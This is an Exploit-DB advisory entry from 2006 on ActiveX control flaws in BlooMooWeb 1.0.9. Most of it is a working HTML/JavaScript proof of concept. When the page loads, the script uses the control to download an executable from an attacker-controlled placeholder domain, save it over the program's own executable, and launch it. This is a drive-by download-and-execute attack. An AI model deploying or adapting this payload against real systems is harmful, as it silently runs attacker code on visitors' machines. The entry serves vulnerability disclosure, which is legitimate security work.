BlooMooWeb 1.0.9 - ActiveX Control Multiple Vulnerabilities

EDB-ID:

28884

CVE:

N/A


Author:

maxgipeh

Type:

remote


Platform:

Windows

Date:

2006-10-31


source: https://www.securityfocus.com/bid/20827/info

BlooMooWeb ActiveX control is prone to multiple vulnerabilities, including:

- an arbitrary file-download issue
- an arbitrary code-execution issue
- an arbitrary file-deletion issue. 

An attacker can exploit these issues to download arbitrary files, execute arbitrary code within the context of the affected application, and delete arbitrary files.

<html>
<head>
<script language="JavaScript">

var binaryUrl="http://some_attacker_controlled_domain/attackerfile.exe";

function spawn2()
{
        aa1=o2obj.GetInstallationDir(null);
        aa2="BlooMooWEB.exe";
        o2obj.BW_DownloadFile(binaryUrl,aa1+aa2,"callback001");
}

function callback001( msgCode, param1, param2, param3 )
{
        if(msgCode == 'DOWNLOAD_COMPLETE' )
        {
                o2obj.BW_LaunchGame("treleferekuku");
        }
}

</script>
</head>

<body onload="spawn2()">
<object ID="o2obj" WIDTH=0 HEIGHT=0
    CLASSID="CLSID:22E9EFBA-114C-4DA0-AE72-D8F2C7138002"
</object>
</body>
</html>